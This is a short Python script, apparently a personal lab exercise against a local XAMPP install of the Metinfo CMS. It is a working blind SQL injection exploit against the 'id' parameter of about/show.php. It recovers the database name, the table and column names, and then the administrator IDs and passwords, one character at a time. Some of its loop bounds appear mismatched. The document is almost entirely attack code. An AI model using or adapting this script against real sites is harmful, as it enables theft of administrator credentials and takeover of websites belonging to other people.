部署环境:xampp 、Metinfo
# metinfo-sqlmap.py
# for循环循环顺序放反时候会直接输出a-z
import requests,string
number = string.printable.strip()
field = "13300000000"
url = "http://***/Metinfo/about/"
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
}
for i in range(20) :
payload = f"show.php?lang=cn&id=22 and length(database())={i} --+"
full_url = url + payload
# print(full_url)
res = requests.get(url = full_url,headers = headers)
if field in res.text :
db_number = i
print(f"数据库长度:{db_number}")
break
db_number = ""
for i in range(1,8) :
for asc_ii in number :
payload = f"show.php?lang=cn&id=22 and ascii(substr((select database()),{i},1))={ord(asc_ii)} --+"
full_url = url + payload
res = requests.get(url = full_url,headers = headers)
if field in res.text :
db_number += asc_ii
print(f"数据库名:{db_number}")
break
for i in range(400) :
payload = f"show.php?lang=cn&id=22 and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))={i} --+"
full_url = url + payload
# print(full_url)
res = requests.get(url = full_url,headers = headers)
if field in res.text :
db_tables_len = i
print(f"数据库表名长度:{db_tables_len}")
break
db_tables = ""
for i in range(1,db_tables_len+1) :
for asc_ii in number :
payload = f"show.php?lang=cn&id=22 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))={ord(asc_ii)} --+"
full_url = url + payload
# print(full_url)
res = requests.get(url = full_url,headers = headers)
if field in res.text :
db_tables += asc_ii
db_tbs = db_tables
print(f"数据库表名:{db_tbs}")
break
for i in range(400) :
payload = f"show.php?lang=cn&id=22 and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65))={i} --+"
full_url = url + payload
# print(full_url)
res = requests.get(url = full_url,headers = headers)
if field in res.text :
db_columns_len = i
print(f"数据库列名长度:{db_columns_len}")
break
db_columns = ""
for i in range(1,db_tables_len) :
for asc_ii in number :
payload = f"show.php?lang=cn&id=22 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65),{i},1))={ord(asc_ii)} --+"
full_url = url + payload
# print(full_url)
res = requests.get(url = full_url,headers = headers)
if field in res.text :
db_columns += asc_ii
print(f"数据库列名:{db_columns}")
break
for i in range(50) :
payload = f"show.php?lang=cn&id=22 and length((select group_concat(admin_id,admin_pass) from met_admin_table))={i} --+"
full_url = url + payload
# print(full_url)
res = requests.get(url = full_url,headers = headers)
if field in res.text :
db_dump_len = i
print(f"数据库列名字段长度:{db_dump_len}")
break
db_dump = ""
for i in range(1,db_columns_len + 1) :
for asc_ii in number :
payload = f"show.php?lang=cn&id=22 and ascii(substr((select group_concat(admin_id,0x2d2d,admin_pass) from met_admin_table),{i},1))={ord(asc_ii)} --+"
full_url = url + payload
# print(full_url)
res = requests.get(url = full_url,headers = headers)
if field in res.text :
db_dump += asc_ii
print(f"数据库列名字段:{db_dump}")
break